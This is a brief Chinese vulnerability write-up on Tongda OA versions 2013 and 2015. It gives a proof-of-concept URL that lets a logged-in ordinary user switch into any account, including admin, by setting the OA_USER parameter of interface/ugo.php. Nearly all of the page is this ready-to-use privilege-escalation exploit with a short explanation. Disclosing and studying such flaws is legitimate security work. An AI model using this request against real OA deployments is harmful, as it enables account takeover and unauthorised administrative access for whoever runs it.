通达oa 任意账号跳转

通达oa 任意账号跳转¶

漏洞描述¶

需要登录

漏洞影响¶

2013、2015版本

漏洞复现¶

POC:

http://url/interface/ugo.php?OA_USER=admin

通过控制OA_USER参数进行任意⽤户的跳转，⽐如说你现在是个普通权限的⽤户，使用这个⻚面即可跳转到admin用户下面。